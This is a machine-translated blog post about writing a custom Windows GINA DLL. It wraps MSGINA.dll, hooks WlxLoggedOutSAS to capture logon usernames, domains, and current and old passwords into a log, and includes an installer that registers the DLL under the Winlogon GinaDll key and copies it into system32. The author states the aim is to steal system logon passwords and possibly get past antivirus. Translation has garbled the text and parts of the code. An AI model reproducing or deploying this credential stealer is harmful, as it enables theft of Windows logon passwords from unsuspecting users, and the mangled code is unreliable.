Compiling Gina. dll

Gina, as Microsoft officially stated:

The Gina operates in the context of the Winlogon process and, as such, the Gina DLL is loaded very early in the boot process. the Gina dll must follow rules so that the integrity of the system is maintained, particle ly with respect to interaction
The user.

Note Gina DLLs are ignored in Windows Vista.

The most common use of the Gina is to communicate with an external device such as a smart-card reader. it is essential to set the start parameter for the device driver to system (winnt. h: service_system_start) to ensure that the driver is loaded by the time
The Gina is invoked.

The purpose of a Gina DLL is to provide customizable user identification and authentication procedures. the default Gina does this by delegating SAS event monitoring to Winlogon, which waits es and processes CTL + ALT + DEL secure attention sequences (SASS ).
A custom Gina is responsible for setting itself up to receive SAS events (other than the default CTRL + ALT + del sas event) and receive Ying WinLogon when SAS events occur. winlogon will evaluate its state to determine what is required to process the custom Gina's
SAS. This processing usually provided des callto the Gina's SAS processing functions.

For information about specific Gina export functions, see Gina export functions. For information about using Gina structures to pass information, see Gina structures.

Translation: (from Goole translation)

Gina operates in the Winlogon process, so that Gina DLL is loaded early in the boot process. Gina
Dll must follow the rules to maintain system integrity, especially with the user interaction.

Note that Gina DLL is ignored in Windows Vista.

Gina, the most common use is communication with external devices, such as a smart card reader. It is important to set the startup parameters for the device driver system (winnt. h: service_system_start) to ensure that Gina is called when the driver is loaded.

A Gina DLL is designed to provide customizable user identification and authentication programs. Default Gina, SAS event monitoring delegate Winlogon to receive and process CTL
+ ALT + DEL, security attention sequence (SASS ). The custom Gina is responsible for setting events that receive SAS (others are worse than the default CTRL
+ ALT + del sas event) and notify the Winlogon SAS event ,. Winlogon will evaluate its status to determine which SAS of Gina is needed. This process usually includes calling Gina's SAS processing function.

For more information about the Gina export function, see the export function of Gina. If you need information about the Gina structure used, transfer the information and see the Gina structure.

 

Which of the following is winlogon.exe?

Windows logon process, Windows NT user logon program, manage user logon and exit. The normal path of the process should be c: \ windows \ system32 and run as a system user. we all know that the operating system is based on permissions, and permissions are based on users. The Winlogon process is used to manage user login and logout, and cannot be terminated.

 

To sum upTo write Gina, you can easily hook the system process Winlogon. I'm a cainiao and I just involved in the preparation of Gina, I personally think that writing Gina may be a serious security vulnerability left by Microsoft. Write Gina by yourself. DLL and enable the system to load third-party Gina. DLL, you can easily obtain the user name and password of the system, and even achieve some unexpected goals. This cainiao is still thinking about the Winlogon process as the security process of the system when writing this blog, it is relatively early to be created. Can you use this advantage to gain system permissions in advance and squeeze out stubborn processes (such as anti-virus software ). This is also a cainiao's guess. It has not been proved by experiments, nor has it had a theoretical basis.

In NT/2000, interactive login support is implemented by WinLogon calling Gina DLL. Gina DLL provides an interactive interface to provide authentication requests for user login. Winlogon interacts with Gina DLL. The default value is MSGINA. dll (in the System32 directory ). Microsoft also provides an interface for us. We can compile Gina DLL to replace MSGINA. dll.

Three desktops will be created during Winlogon initialization:
(1) Winlogon desktop: displays Windows security and other interfaces, such as pressing CTRL + ALT + DEL and logging in to Windows.
(2) Application desktop: The interface we usually see on my computer
(3) Screen Saver desktop: Screen Saver display interface.

 

Let's take a look at how we compile our Gina. DLL, this should not be difficult, we wrote Gina. DLL needs to export the original Microsoft MSGINA. for all DLL functions, the implementation of these functions directly calls the original MSGINA. DLL export function. Then we can add our own code to the specific functions we need to achieve our own goal.

 

First, we need to know which functions are exported by the original MSGINA. dll. By referring to Microsoft's help document, we can easily find that MSGINA. dll has exported the following 19 functions: (it is said that Windows 2000 should have one more function than the 19 functions in this document, and this cainiao did not think about it carefully)

Function	Description
Wlxactivateusershell	Activate User Shell
Wlxdisplaylockednotice	Allow Gina DLL to display lock Information
Wlxdisplaysasnotice	Winlogon calls this function when no user logs in.
Wlxdisplaystatusmessage	Winlogon calls this function with a status information for display.
Wlxgetconsoleswitchcredentials	Winlogon calls this function to read the trust information of the current login user and transparently upload them to the target session.
Wlxgetstatusmessage	Winlogon calls this function to obtain the current status information
Wlxinitialize	Gina DLL initialization for the specified window location
Wlxislockok	Verify that the workstation is properly locked
Wlxislogoffok	Verify normal Cancellation
Wlxloggedonsas	The user has logged on and the workstation has not been locked. If a SAS event is received at this time, Winlogon calls this function.
Wlxloggedoutsas	No user logs in. If a SAS event is received at this time, Winlogon calls this function. This indicates that a logon attempt shoshould be made.
Wlxlogoff	Notification to Gina DLL when requesting cancellation
Wlxnegotiate	Indicates whether the Gina dll can be used in the current Winlogon version.
Wlxnetworkproviderload	After the network service provider collects identity and authentication information, Winlogon calls this function.
Wlxremovestatusmessage	Winlogon calls this function to tell Gina DLL to stop displaying status information
Wlxscreensaverpolicy	Allow Gina to interact with screen saver operations
Wlxshutdown	Before the function is disabled, Winlogon calls this function to allow Gina to disable any tasks, such as exiting the smart card from the card reader.
Wlxstartapplication	This function is called when the system needs to start the application in the user's context.
Wlxwkstalockedsas	Winlogon calls this function when the workstation is locked and receives a SAS

The work is easier. This cainiao only writes the definition of one function, instantiates it, and assigns the value to the original function address. The other 18 functions are the same.

 

 

Typedef bool // first define a structure (winapi * pwlxnegotiate) (DWORD dwwinlogonversion, pdword pdwdllversion );

 

Pwlxnegotiateprcwlxnegotiate = NULL; // instantiate

 

Prcwlxnegotiate = (pwlxnegotiate) getprocaddress (hgina, "wlxnegotiate"); // export the original function address from the original dynamic link library and assign it to our function

 

 

Bool winapi wlxnegotiate (// In the self-compiled Gina. DLL dynamic link library to export this function, call wlxnegotiate to implement the original function DWORD dwwinlogonversion, pdword pdwdllversion) {return prcwlxnegotiate (dwwinlogonversion, pdwdllversion );}

 

 

We use a simple method to define the function for exporting the dynamic link library (add the. Def file ):

EXPORTS    WlxGetConsoleSwitchCredentials  @1WlxActivateUserShell@2WlxDisplayLockedNotice@3WlxDisplaySASNotice@4WlxDisplayStatusMessage@5WlxGetStatusMessage@6WlxInitialize@7WlxIsLockOk@8WlxIsLogoffOk@9WlxLoggedOnSAS@10WlxLoggedOutSAS@11WlxLogoff@12WlxNegotiate@13WlxNetworkProviderLoad@14WlxRemoveStatusMessage@15WlxScreenSaverNotify@16WlxShutdown@17WlxStartApplication@18WlxWkstaLockedSAS@19

 

In this way, a simple Gina. dll is basically implemented, and the original functions of MSGINA. dll are basically implemented.

 

 

Then, we want to achieve our specific purpose. Here, the cainiao takes the interception of the system logon password as an example. First, you need to know which functions are called during system logon. by querying msdn, we can easily find this function:
Wlxloggedoutsasmsdn:

TheWlxloggedoutsasFunction must be implemented by a replacementGinaDLL.WinlogonCallthis function when it has es
Secure attention sequence(SAS) event while no user is logged on.

To replace the Gina DLL, you must implement the wlxloggedoutsas function. Winlogon calls this function when it receives a security attention sequence (SAS) event without user logon. (From Goole translation)

 

This function needs to be called during login, so the problem becomes clear. Let's take a look at this function.

Syntaxint WlxLoggedOutSAS(  __in     PVOID pWlxContext,  __in     DWORD dwSasType,  __out    PLUID pAuthenticationId,  __inout  PSID pLogonSid,  __out    PDWORD pdwOptions,  __out    PHANDLE phToken,  __out    PWLX_MPR_NOTIFY_INFO pNprNotifyInfo,  __out    PVOID* pProfile);

We need to pay attention to the pwlx_mpr_policy_info struct:

 

Typedef struct _ wlx_mpr_policy_info {pwstr pszusername; // user name pwstr pszdomain; // computer name pwstr pszpassword; // password pwstr pszoldpassword; // old password} Finally, * pwlx_mpr_policy_info;

 

Then we can directly obtain the system logon password from this struct. The source code is as follows:

Int winapi example (pvoid pwlxcontext, DWORD dwsastype, pluid example, psid plogonsid, pdword pdwoptions, phandle phtoken, login token, pvoid * pprofile) {int iret = 0; pwstr pszusername = NULL; // username pwstr pszdomain = NULL; // machine name pwstr pszpassword = NULL; // password pwstr pszoldpassword = NULL; // old password writeinfo ("wlxloggedoutsas \ r \ n "); iret = prcwlxloggedoutsas (pwlxcontext, dwsas Type, pauthenticationid, plogonsid, pdwoptions, phtoken, pmprnotifyinfo, pprofile); If (iret = required) {pszusername = pmprpolicyinfo-> pszusername; If (pszusername! = NULL) {writeinfo ("username:"); writeinfow (pszusername); // output function} pszdomain = pmprpolicyinfo-> pszdomain; If (pszdomain! = NULL) {writeinfo ("COMPUTER:"); writeinfow (pszdomain);} pszpassword = pmprpolicyinfo-> pszpassword; If (pszpassword! = NULL) {writeinfo ("Password:"); writeinfow (pszpassword);} pszoldpassword = pmprpolicyinfo-> pszoldpassword; If (pszoldpassword! = NULL) {writeinfo ("oldpassword:"); writeinfow (pszoldpassword) ;}} return iret ;}

At this point, the preparation of our Gina is over. As for the installation of this Gina, I will copy it to you:

1. Add a Registry
Key name: \ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon
Variable name: GinaDLL
Variable type: [REG_SZ]
Content: "the name of your gina DLL" For example: "mygina. dll:

2. Copy your gina DLL (mygina. dll) to the system directory (system32 );

3. Restart the machine and your gina DLL (mygina. dll) will run.

 

You can also write a applet to automatically implement the above functions. The source code is as follows (Gina. dll should be in the same directory as the installer ):

#include "windows.h"#include "tchar.h"BOOL SetRegedit(){HKEY hKey=NULL;LPCTSTR data=_T("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");LPCTSTR Value=_T("GINA.dll");if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,data,0,KEY_ALL_ACCESS,&hKey)==ERROR_SUCCESS){        RegSetValueEx(hKey,_T("GinaDll"),0,REG_SZ,(LPBYTE)Value,50);return TRUE;}return FALSE;}BOOL Move(){if((MoveFileEx(_T(".\\GINA.dll"),_T("c:\\WINDOWS\\system32\\GINA.dll"),MOVEFILE_REPLACE_EXISTING))!=0)return TRUE;elsereturn FALSE;}int WINAPI WinMain(HINSTANCE, HINSTANCE, char *, int cmdShow){if(SetRegedit()==FALSE)MessageBox(NULL,"SetRegedit fuild","Error",MB_OK);if (Move()==FALSE)MessageBox(NULL,"Move fuild","Error",MB_OK);return 0;}

Well, this blog is a perfect end. Finally, I will explain that cainiao's remarks are only for entertainment.